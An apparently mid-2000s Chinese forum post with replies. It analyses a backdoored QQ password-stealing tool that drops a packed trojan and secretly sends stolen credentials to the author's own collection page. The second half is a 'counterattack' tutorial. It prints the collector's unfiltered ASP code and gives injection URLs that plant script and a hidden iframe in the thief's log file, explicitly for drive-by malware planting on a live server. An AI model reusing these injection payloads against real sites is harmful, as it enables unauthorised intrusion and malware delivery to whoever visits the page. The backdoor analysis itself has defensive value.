找出安全漏洞 QQ盗号软件后门分析与反击

今天无聊给一朋友讲解[b]QQ盗取[/b]原理，从网上找了一个工具 “[b]明小子QQ密码特工[/b]”结果发现这个软件有后门。下面就让我带着大家来分析一下。 　　首先我们用nod32来查一下有没有毒。图1
[align=center][img]http://soft.yesky.com/imagelist/2007/331/te53w81g8i63.jpg[/img][/align]　　看到了吧没有病毒。我们把监控打开在运行看看图2
[align=center][img]http://soft.yesky.com/imagelist/2007/331/g772e3q90wig.jpg[/img][/align]　　看到了吧 NOD32检测到了病毒。为了确认一下。我再用‘木马辅助查找器’的文件监视功能来检测下。图3
[align=center][img]http://soft.yesky.com/imagelist/2007/331/1cm3k212s6o3.jpg[/img][/align][align=center]　新建 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe

　　很明显软件本身在运行的同时释放了一个123.exe 而NOD32查杀到的也就是这个文件。

　　C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\ [/align]
　　接着我们用peid查下123.exe. 图4
[align=center][img]http://soft.yesky.com/imagelist/2007/331/ubofl0v2l006.jpg[/img][/align]　　EP段.nsp1经常搞免杀的应该知道这是北斗加的壳，我们再看看区段vmp 图5
[align=center][img]http://soft.yesky.com/imagelist/2007/331/5o6rexmjh0cn.jpg[/img][/align]　　这个一看就是用vmprotect做的免杀。至于123.exe是什么木马咱门就不继续分析了。
　　接下来分析他生成后的文件是不是一样令人担忧。

　　随便配置一个图6
[align=center][img]http://soft.yesky.com/imagelist/2007/331/qp0jcacn705d.jpg[/img][/align]　　Ollydbg手工给他脱壳esp定律简单 图7
[align=center][img]http://soft.yesky.com/imagelist/2007/331/h5u09ox4c5vr.jpg[/img][/align]　　脱壳成功后我们在用PEID检测下 图8
[align=center][img]http://soft.yesky.com/imagelist/2007/331/d117n951c84m.jpg[/img][/align]
[align=center]我们再用c32asm对他进行反汇编，搜索asp图9 [/align]
[align=center][img]http://soft.yesky.com/imagelist/2007/331/66l0rc5g61na.jpg[/img][/align]　　看到了什么 .刚才我是默认设置的应该是[url]http://k.thec.cn/xieming/69q/qq.asp[/url]才对。，怎么会是[url]http://langyeqq.cn/qq/newbacka.asp[/url] 这个呢！我们浏览看看 图10
[align=center][img]http://soft.yesky.com/imagelist/2007/331/7t6ixsnijq0k.jpg[/img][/align]　　"pzQQ"看到了吧，说明就是他的盗号的，从这些可以确定，这个软件不但运行的时候施放一个木马，而且就连我们配置好的文件也被他留了后门，而作者就坐等着收号了。
　　后门反击战 作者：fhod

　　看到这..想必大家也和我一样非常气愤..难道我们就任由作者下去吗.当然不..现在我们就开始反击.

　　我们来看看qq.asp的代码
　　首先来看

　　strLogFile="Q7.txt"

　　这个是QQ接受文件..默认的是q7.txt
　　继续看代码
QQNumber=request("QQNumber")
QQPassWord=request("QQPassWord")
QQclub=request("QQclub")
QQip=request("QQip")
　　是没经过任何过滤的..这些参数的数据我们完全可以自定义
　　在往下看
if QQNumber="" or QQPassWord="" then
response.write "pzQQ"
response.end
　　假如QQNumber和QQPassWord的值为空就返回pzQQ .然后程序结束工作.. 只要这两个值不为空就继续执行下面的代码
StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----会员:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")
StrLogText=StrLogText&")"

　　写入q7.txt文件

　　格式为 QQ号码----QQ密码----会员:----IP:
　　继续看下面的代码
set f=Server.CreateObject("scripting.filesystemobject") (没有q7.txt这个文件就自动新建)
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
ff.writeline(StrLogText) (打开q7.txt并写入数据)
　　最后response.write "发送成功!" 满足条件提示成功.
　　所有的代码也就是这些..程序并未做任何过滤..和处理..也就是说..只要满足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "发送成功!"的提示.
　　[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&amp[/url];QQPassWord=123图11
[align=center][img]http://soft.yesky.com/imagelist/2007/331/34m025388abm.jpg[/img][/align]　　这就证明了QQNumber=123&QQPassWord=123这两个我们是可以自己定义的..如果我们写入的不是数字..而且一段脚本代码呢?会不会执行呢..让我们来试下
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=< ... quot;fhod")</script>

　　图12
[align=center][img]http://soft.yesky.com/imagelist/2007/331/9eftgaxwb5w2.jpg[/img][/align]　　插入代码成功...我们来看下

　　[url]http://www.ciker.org/soft/q7.txt[/url]的源文件又是什么样的..
　　图13
[align=center][img]http://soft.yesky.com/imagelist/2007/331/k0f03a2zd6e5.jpg[/img][/align]
[align=center]　　再次证明对提交的数据是无任何限制的...我们完全可以自己发挥想象.插入任何代码都可以...

　　如果想反挂马的话..我们就可以提交以下数据
[/align]
[table=95%][tr][td][b]以下是引用片段：
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQ[/b]PassWord=<iframe%20&# ... 20width=480%20height=480></iframe>[/td][/tr][/table]
　　图14
[align=center][img]http://soft.yesky.com/imagelist/2007/331/g8gh9846k5ha.jpg[/img][/align]　　当然我这里把width和height设置为480只是为了方便演示..实际挂马中要改为0
　　好了..现在我们就可以给作者一个惊喜去了..图15
[align=center][img]http://soft.yesky.com/imagelist/2007/331/7h4s370y51l5.jpg[/img] [/align]

有无有更傻瓜的办法啊:20:  这个我看着头晕

回复 #2 圆心 的帖子

这个吗 还想没有！

不过可以教你些其它的～

可以在群里讨论！

:05:  看不明白

我也看不明白

看不懂

看不明白:07:

有没我这种菜鸟看的懂:05: 的啊老鸟们

好玩,反击方式不错~~~~尤其看到那图后,估计那黑客要气死!或笑死!~~~~~~`:05: :05: :01:

有人就有生机 所以盗号的人屡禁不止

好复杂:24:

不复杂就是 图片不显示

这咋办.... 能能整个简单点的啊........:17: :17: :17: :17:

晕~~太复杂了，没耐心学。

估计那家伙正在那边郁闷！

再来学习过！！！:04:

不是很明白 。

学习学习!

深刻学习中.............

谢谢  支持了！！:S0004:

没看明白:S0011:

:S0001: 怎么杀掉那些木马？

没被盗过..............